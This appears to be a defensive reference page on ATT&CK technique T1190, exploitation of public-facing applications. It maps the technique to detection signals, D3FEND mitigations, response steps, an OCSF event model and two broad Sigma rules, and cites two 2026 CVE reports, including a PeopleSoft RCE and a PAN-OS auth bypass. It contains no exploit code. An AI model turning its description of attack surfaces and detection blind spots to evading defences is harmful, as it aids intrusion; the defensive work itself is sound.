T1190 Defined ATT&CK T1190 ↗

Exploit Public-Facing Application

Attacker Modify ApplicationProcess — Exploit a vulnerability in a public-facing application to cause it to execute attacker-controlled code or expose data beyond its intended scope.

Ontological Definition

ActorAttacker

→

ActionModify

→

ArtifactApplicationProcess

Detect

STP 3

CVE-specific signatures are STP 1–2. Post-exploitation behavioral signals (application process spawning a shell, writing executables to unexpected paths) use variable victim-side fields and require baselining — STP 3.

Gate on

activity_id = Access

Focus on post-exploitation signals: the application process spawning a shell or writing executables outside its expected paths. CVE-specific WAF rules are STP 1–2.

Mitigate

STP 5

Patching is STP 1 per CVE. Application sandboxing (seccomp, AppArmor, container constraints) prevents the post-exploitation effect — process spawning, filesystem writes — across all CVEs regardless of vulnerability class. This is STP 5 for the controlled post-attack state.

D3FEND controls

d3f:NetworkTrafficFilteringd3f:ExecutionIsolation

Enforce process isolation and filesystem restrictions on all public-facing application processes (seccomp, AppArmor, container constraints).

Respond

Controlled

The target process now executes attacker-controlled code. Kill the injector process and the compromised target immediately. Investigate all files, network connections, and child processes they spawned.

Attacker foothold

Attacker Originsrc_endpoint

Compromised by this technique

Vulnerable Applicationprocess

D3FEND response actions

d3f:ProcessTerminationd3f:NetworkIsolation

OCSF event model▼

Event class: Web Resources Activity (6001) · activity_id: Access

attacker-controlledpost-successvictimtainted

%%{init: {"theme": "dark", "themeVariables": {"edgeLabelBackground": "#18181b", "lineColor": "#52525b"}}}%%
graph TD
  classDef attacker fill:#7c2d12,stroke:#ea580c,color:#fed7aa
  classDef victim fill:#1e3a5f,stroke:#3b82f6,color:#bfdbfe
  classDef postSuccess fill:#78350f,stroke:#d97706,color:#fde68a
  classDef tainted fill:#18181b,stroke:#52525b,color:#a1a1aa

  EVENT(["Web Resources Activity\n· Access"])

  attacker_src["Attacker Origin\nsrc_endpoint\nd3f:Host"]:::attacker
  app_process["Vulnerable Application\nprocess\nd3f:Process"]:::postSuccess
  device["Host\ndevice\nd3f:Host\n⚠ tainted"]:::tainted

  EVENT --> attacker_src
  EVENT --> app_process
  EVENT --> device

  attacker_src -->|"exploits"| app_process

Attacker Origin

src_endpoint·d3f:Host

attacker-controlled

src_endpoint.ip attacker_controlled Source IP — attacker-controlled, easily rotated

Countermeasures

d3f:NetworkTrafficFiltering

Vulnerable Application

process·d3f:Process

post-success

process.pid variable Application process identifier — victim-side, OS-assigned; becomes attacker-controlled after success

Countermeasures

d3f:ProcessTerminationd3f:ExecutionIsolation

Host

device·d3f:Host

tainted

Countermeasures

d3f:NetworkIsolation

Definitional Sigma rule▼

Broad by design — defines the technique, not an operational alert. Gate on variable or attacker-controlled field conditions to narrow for production use.

title: Exploit Public-Facing Application (T1190)
status: experimental
description: >
  Definitional rule — broad by design. Defines the technique independent of
  medium, tool, or attacker-controlled variables. Narrow with variable and
  attacker-controlled field conditions for operational use.
logsource:
  product: ocsf
  category: Web Resources Activity (6001)
detection:
  selection:
    activity_id: 'Access'
  condition: selection

title: Exploit Public-Facing Application (T1190) — native Sigma
status: experimental
description: >
  Generated from OCSF definitional rule. Broad by design — defines the technique,
  not an operational alert. Targets standard Windows/Sysmon telemetry.
logsource:
  category: webserver
detection:
  # Web Resources Activity maps to web server or WAF access logs, not endpoint telemetry. No standard Sysmon equivalent.
  # All events of this logsource type match the technique definition.
  # Add variable or attacker-controlled field conditions to narrow for operational use.
  filter_all: '*'
  condition: filter_all

Environment-dependent entities▼

Generate org-specific sub-techniques using T1190.<platform>

Web Application

Custom or third-party web applications exposed to the internet

Apache/Nginx hosted appsDjango/Rails/Node applicationsWordPress/CMS platforms

VPN / Remote Access

Network edge devices providing remote access

Citrix ADCPulse SecureFortinet FortiGatePalo Alto GlobalProtect

Mail Server

Internet-facing mail infrastructure

Microsoft ExchangePostfixZimbra

API Gateway

Externally exposed API surfaces

AWS API GatewayKongApigee

Seen in the wild2reports▼

CVE-2026-35273: Pre-Authentication RCE in Oracle PeopleSoft PeopleTools ↗

Trend Micro·2026-06-10

SSRF chained with XMLDecoder deserialization achieves RCE inside the WebLogic JVM with no child process — illustrating why T1190 EDEs need per-platform detection rules: this instance is invisible to rules watching for Java spawning shells.

Active Exploitation of PAN-OS CVE-2026-0257 ↗

Unit 42·2026-05-30

Authentication bypass in GlobalProtect allows forging auth override cookies — a T1190.panos EDE instance where the technique is application-specific and the post-attack state is controlled via an unauthorized VPN session.